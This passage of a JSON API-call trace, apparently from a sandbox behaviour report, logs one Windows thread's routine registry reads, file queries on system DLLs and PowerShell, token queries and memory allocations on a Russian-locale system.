"\\x00\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00j\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf2\\x02\\x00\\x00\\x00\\x00\\xf9\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1639 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee34867ec", "parentcaller": "0x7ffee10bfa4e", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000550" }, { "name": "DesiredAccess", "value": "0x02000000", "pretty_value": "MAXIMUM_ALLOWED" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER" } ], "repeated": 0, "id": 1640 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10bf9e9", "parentcaller": "0x7ffee10cad45", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000054c" }, { "name": "DesiredAccess", "value": "0x0002001f", "pretty_value": "KEY_READ|KEY_WRITE" }, { "name": "ObjectAttributesHandle", "value": "0x00000550" }, { "name": "ObjectAttributesName", "value": "Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78" } ], "repeated": 0, "id": 1641 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10bfa05", "parentcaller": "0x7ffee10cad45", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000550" } ], "repeated": 0, "id": 1642 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10c07f5", "parentcaller": "0x7ffee10ba864", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" } ], "repeated": 0, "id": 1643 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10be270", "parentcaller": "0x7ffee10bb8b0", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000054c" }, { "name": "ValueName", "value": "@%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe,-124" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "\\x428\\x438\\x444\\x440\\x43e\\x432\\x430\\x43d\\x438\\x435 \\x434\\x43e\\x43a\\x443\\x43c\\x435\\x43d\\x442\\x43e\\x432" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe,-124" } ], "repeated": 0, "id": 1644 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10ba8d5", "parentcaller": "0x7ffee10ffc2b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000054c" } ], "repeated": 0, "id": 1645 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbf464", "parentcaller": "0x7ffee0bbf2b2", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000548" } ], "repeated": 0, "id": 1646 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbe88e", "parentcaller": "0x7ffee0bb263f", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000544" } ], "repeated": 0, "id": 1647 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbe781", "parentcaller": "0x7ffee0bb263f", "category": "registry", "api": "RegEnumKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000540" }, { "name": "Index", "value": "5" }, { "name": "Name", "value": "1.3.6.1.4.1.311.92.1.1!7" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.92.1.1!7" } ], "repeated": 0, "id": 1648 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbe7b1", "parentcaller": "0x7ffee0bb263f", "category": "registry", "api": "RegOpenKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x00000540" }, { "name": "SubKey", "value": "1.3.6.1.4.1.311.92.1.1!7" }, { "name": "Handle", "value": "0x00000544" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.92.1.1!7" } ], "repeated": 0, "id": 1649 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbe9c3", "parentcaller": "0x7ffee0bbe7fb", "category": "registry", "api": "RegQueryInfoKeyW", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000544" }, { "name": "Class", "value": "" }, { "name": "SubKeyCount", "value": "0" }, { "name": "MaxSubKeyLength", "value": "0" }, { "name": "MaxClassLength", "value": "0" }, { "name": "ValueCount", "value": "1" }, { "name": "MaxValueNameLength", "value": "4" }, { "name": "MaxValueLength", "value": "88" } ], "repeated": 0, "id": 1650 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbeac9", "parentcaller": "0x7ffee0bbe7fb", "category": "registry", "api": "RegEnumValueW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000544" }, { "name": "Index", "value": "0" }, { "name": "ValueName", "value": "Name" }, { "name": "Data", "value": "@%SystemRoot%\\system32\\NgcRecovery.dll,-100" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.92.1.1!7\\Name" } ], "repeated": 0, "id": 1651 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbf1d0", "parentcaller": "0x7ffee0bb34e9", "category": "registry", "api": "RegOpenKeyExA", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.92.1.1!7" }, { "name": "Handle", "value": "0x00000548" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.92.1.1!7" } ], "repeated": 0, "id": 1652 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10c2e92", "parentcaller": "0x7ffee10ffb6e", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000548" }, { "name": "ValueName", "value": "Name" }, { "name": "Data", "value": "@%SystemRoot%\\system32\\NgcRecovery.dll,-100" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.92.1.1!7\\Name" } ], "repeated": 0, "id": 1653 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10baeb5", "parentcaller": "0x7ffee10ba4cb", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000054c" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings" } ], "repeated": 0, "id": 1654 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10baf05", "parentcaller": "0x7ffee10ba4cb", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000054c" }, { "name": "ValueName", "value": "StringCacheGeneration" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "2" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration" } ], "repeated": 0, "id": 1655 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10baf2f", "parentcaller": "0x7ffee10ba4cb", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000054c" } ], "repeated": 0, "id": 1656 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee34a6c8b", "parentcaller": "0x7ffee34867b5", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x00\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00j\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf2\\x02\\x00\\x00\\x00\\x00\\xf9\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1657 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee34867ec", "parentcaller": "0x7ffee10bfa4e", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000054c" }, { "name": "DesiredAccess", "value": "0x02000000", "pretty_value": "MAXIMUM_ALLOWED" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER" } ], "repeated": 0, "id": 1658 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10bf9e9", "parentcaller": "0x7ffee10cad45", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000550" }, { "name": "DesiredAccess", "value": "0x0002001f", "pretty_value": "KEY_READ|KEY_WRITE" }, { "name": "ObjectAttributesHandle", "value": "0x0000054c" }, { "name": "ObjectAttributesName", "value": "Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78" } ], "repeated": 0, "id": 1659 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10bfa05", "parentcaller": "0x7ffee10cad45", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000054c" } ], "repeated": 0, "id": 1660 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10c07f5", "parentcaller": "0x7ffee10ba864", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\NgcRecovery.dll" } ], "repeated": 0, "id": 1661 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10be270", "parentcaller": "0x7ffee10bb8b0", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000550" }, { "name": "ValueName", "value": "@%SystemRoot%\\system32\\NgcRecovery.dll,-100" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "\\x428\\x438\\x444\\x440\\x43e\\x432\\x430\\x43d\\x438\\x435 \\x43a\\x43b\\x44e\\x447\\x430 \\x432\\x43e\\x441\\x441\\x442\\x430\\x43d\\x43e\\x432\\x43b\\x435\\x43d\\x438\\x44f Windows Hello" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\NgcRecovery.dll,-100" } ], "repeated": 0, "id": 1662 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10ba8d5", "parentcaller": "0x7ffee10ffc2b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000550" } ], "repeated": 0, "id": 1663 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10c2e92", "parentcaller": "0x7ffee10ffb6e", "category": "registry", "api": "RegQueryValueExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000548" }, { "name": "ValueName", "value": "Name" }, { "name": "Data", "value": "@%SystemRoot%\\system32\\NgcRecovery.dll,-100" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\1.3.6.1.4.1.311.92.1.1!7\\Name" } ], "repeated": 0, "id": 1664 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10baeb5", "parentcaller": "0x7ffee10ba4cb", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000550" }, { "name": "DesiredAccess", "value": "0x00000001", "pretty_value": "KEY_QUERY_VALUE" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\MUI\\StringCacheSettings" } ], "repeated": 0, "id": 1665 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10baf05", "parentcaller": "0x7ffee10ba4cb", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000550" }, { "name": "ValueName", "value": "StringCacheGeneration" }, { "name": "Type", "value": "4", "pretty_value": "REG_DWORD" }, { "name": "Information", "value": "2" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\MUI\\StringCacheSettings\\StringCacheGeneration" } ], "repeated": 0, "id": 1666 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10baf2f", "parentcaller": "0x7ffee10ba4cb", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000550" } ], "repeated": 0, "id": 1667 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee34a6c8b", "parentcaller": "0x7ffee34867b5", "category": "process", "api": "NtQueryInformationToken", "status": true, "return": "0x00000000", "arguments": [ { "name": "TokenInformationClass", "value": "1" }, { "name": "TokenInformation", "value": "\\x00\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00j\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf2\\x02\\x00\\x00\\x00\\x00\\xf9\\xde\\xd5\\x06\\x00\\x00\\x00\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00" } ], "repeated": 0, "id": 1668 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee34867ec", "parentcaller": "0x7ffee10bfa4e", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x00000550" }, { "name": "DesiredAccess", "value": "0x02000000", "pretty_value": "MAXIMUM_ALLOWED" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER" } ], "repeated": 0, "id": 1669 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10bf9e9", "parentcaller": "0x7ffee10cad45", "category": "registry", "api": "NtOpenKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000054c" }, { "name": "DesiredAccess", "value": "0x0002001f", "pretty_value": "KEY_READ|KEY_WRITE" }, { "name": "ObjectAttributesHandle", "value": "0x00000550" }, { "name": "ObjectAttributesName", "value": "Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78" }, { "name": "ObjectAttributes", "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78" } ], "repeated": 0, "id": 1670 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10bfa05", "parentcaller": "0x7ffee10cad45", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000550" } ], "repeated": 0, "id": 1671 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10c07f5", "parentcaller": "0x7ffee10ba864", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\NgcRecovery.dll" } ], "repeated": 0, "id": 1672 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10be270", "parentcaller": "0x7ffee10bb8b0", "category": "registry", "api": "NtQueryValueKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "KeyHandle", "value": "0x0000054c" }, { "name": "ValueName", "value": "@%SystemRoot%\\system32\\NgcRecovery.dll,-100" }, { "name": "Type", "value": "1", "pretty_value": "REG_SZ" }, { "name": "Information", "value": "\\x428\\x438\\x444\\x440\\x43e\\x432\\x430\\x43d\\x438\\x435 \\x43a\\x43b\\x44e\\x447\\x430 \\x432\\x43e\\x441\\x441\\x442\\x430\\x43d\\x43e\\x432\\x43b\\x435\\x43d\\x438\\x44f Windows Hello" }, { "name": "FullName", "value": "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2\\B1A07F78\\@%SystemRoot%\\system32\\NgcRecovery.dll,-100" } ], "repeated": 0, "id": 1673 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee10ba8d5", "parentcaller": "0x7ffee10ffc2b", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000054c" } ], "repeated": 0, "id": 1674 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbf464", "parentcaller": "0x7ffee0bbf2b2", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000548" } ], "repeated": 0, "id": 1675 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbe88e", "parentcaller": "0x7ffee0bb263f", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000544" } ], "repeated": 0, "id": 1676 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbe781", "parentcaller": "0x7ffee0bb263f", "category": "registry", "api": "RegEnumKeyExA", "status": false, "return": "0x00000103", "pretty_return": "NO_MORE_ITEMS", "arguments": [ { "name": "Handle", "value": "0x00000540" }, { "name": "Index", "value": "6" }, { "name": "Name", "value": "" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography\\OID\\EncodingType 0\\CryptDllFindOIDInfo\\" } ], "repeated": 0, "id": 1677 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbe8a4", "parentcaller": "0x7ffee0bb263f", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000540" } ], "repeated": 0, "id": 1678 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbe6c9", "parentcaller": "0x7ffee0bb263f", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000053c" } ], "repeated": 0, "id": 1679 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbe6e2", "parentcaller": "0x7ffee0bb263f", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000538" } ], "repeated": 0, "id": 1680 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bb2b05", "parentcaller": "0x7ffee0bb2644", "category": "registry", "api": "RegOpenKeyExW", "status": true, "return": "0x00000000", "arguments": [ { "name": "Registry", "value": "0x80000002", "pretty_value": "HKEY_LOCAL_MACHINE" }, { "name": "SubKey", "value": "SYSTEM\\CurrentControlSet\\Control\\Cryptography\\ECCParameters" }, { "name": "Handle", "value": "0x00000538" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Cryptography\\ECCParameters" } ], "repeated": 0, "id": 1681 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bb2b3c", "parentcaller": "0x7ffee0bb2644", "category": "registry", "api": "RegEnumKeyExW", "status": false, "return": "0x00000103", "pretty_return": "NO_MORE_ITEMS", "arguments": [ { "name": "Handle", "value": "0x00000538" }, { "name": "Index", "value": "0" }, { "name": "Name", "value": "" }, { "name": "Class", "value": "" }, { "name": "FullName", "value": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Cryptography\\ECCParameters\\" } ], "repeated": 0, "id": 1682 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee0bbf464", "parentcaller": "0x7ffee0bb2b53", "category": "registry", "api": "RegCloseKey", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x00000538" } ], "repeated": 0, "id": 1683 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05d64000" }, { "name": "RegionSize", "value": "0x00005000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1684 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05d69000" }, { "name": "RegionSize", "value": "0x00003000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1685 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee34a84c4", "parentcaller": "0x7ffee34bd136", "category": "registry", "api": "NtOpenKey", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "KeyHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x00020019", "pretty_value": "KEY_READ" }, { "name": "ObjectAttributesHandle", "value": "0x00000000" }, { "name": "ObjectAttributesName", "value": "\\Registry\\Machine\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\ru-RU" }, { "name": "ObjectAttributes", "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\LanguageOverlay\\OverlayPackages\\ru-RU" } ], "repeated": 0, "id": 1686 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee34bbb2a", "parentcaller": "0x7ffee34bb99e", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x00000538" }, { "name": "DesiredAccess", "value": "0x00100001", "pretty_value": "FILE_READ_ACCESS|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\ru-RU\\CRYPT32.dll.mui" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 1687 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee34bbb82", "parentcaller": "0x7ffee34bb99e", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000053c" }, { "name": "DesiredAccess", "value": "0x000f0005", "pretty_value": "STANDARD_RIGHTS_REQUIRED|SECTION_QUERY|SECTION_MAP_READ" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x00000538" }, { "name": "FileName", "value": "C:\\Windows\\System32\\ru-RU\\crypt32.dll.mui" } ], "repeated": 0, "id": 1688 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee34bbbcc", "parentcaller": "0x7ffee34bb99e", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x0000053c" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x02f10000" }, { "name": "SectionOffset", "value": "0x06d5dd90" }, { "name": "ViewSize", "value": "0x0000c000" }, { "name": "Win32Protect", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1689 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee34bbbdc", "parentcaller": "0x7ffee34bb99e", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x0000053c" } ], "repeated": 0, "id": 1690 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05d6c000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1691 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": "0x7ffee347e715", "parentcaller": "0x7ffee347e37b", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x05d6e000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 1692 }, { "timestamp": "2025-11-20 10:58:35,375", "thread_id": "1596", "caller": 